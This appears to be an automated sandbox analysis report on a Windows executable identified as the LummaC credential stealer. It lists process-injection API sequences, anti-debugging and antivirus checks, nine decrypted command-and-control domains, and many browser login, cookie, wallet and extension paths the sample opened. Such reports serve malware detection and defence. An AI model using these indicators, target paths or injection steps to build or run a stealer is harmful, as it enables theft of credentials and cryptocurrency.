Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B71FB0 mov edi, dword ptr fs:[00000030h]	0_2_00B71FB0
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B71FB0 mov edi, dword ptr fs:[00000030h]	3_2_00B71FB0

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 0_2_00B8D8E0 GetProcessHeap,

0_2_00B8D8E0

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B7F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B7F52D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B7F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B7F8E9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B7F8DD SetUnhandledExceptionFilter,	0_2_00B7F8DD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 0_2_00B87E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B87E30
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B7F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00B7F52D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B7F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B7F8E9
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B7F8DD SetUnhandledExceptionFilter,	3_2_00B7F8DD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: 3_2_00B87E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B87E30

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 0_2_00BAA19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00BAA19E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Memory written: C:\Users\user\Desktop\0x001f00000004676d-1858.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: 0x001f00000004676d-1858.exe, 00000000.00000002.2033892567.00000000043A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: mindhandru.buzz

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Process created: C:\Users\user\Desktop\0x001f00000004676d-1858.exe "C:\Users\user\Desktop\0x001f00000004676d-1858.exe"	Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	0_2_00B8D1BD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00B91287
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	0_2_00B914D8
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00B91580
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	0_2_00B917D3
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	0_2_00B91840
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	0_2_00B91915
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	0_2_00B91960
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00B91A07
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	0_2_00B91B0D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	0_2_00B8CC15
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	3_2_00B8D1BD
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00B91287
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	3_2_00B914D8
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00B91580
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	3_2_00B917D3
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	3_2_00B91840
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: EnumSystemLocalesW,	3_2_00B91915
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	3_2_00B91960
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00B91A07
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	3_2_00B91B0D
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	Code function: GetLocaleInfoW,	3_2_00B8CC15

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Code function: 0_2_00B800B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_00B800B4

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.000000000319A000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657473252.00000000031B6000.00000004.00000020.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2619264262.000000000584C000.00000004.00000800.00020000.00000000.sdmp, 0x001f00000004676d-1858.exe, 00000005.00000003.2657473252.000000000319A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0x001f00000004676d-1858.exe PID: 2020, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2587647015.000000000321B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3S
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2615557186.00000000031B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2587726023.00000000031A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 0x001f00000004676d-1858.exe, 00000005.00000003.2588200320.000000000317B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\0x001f00000004676d-1858.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
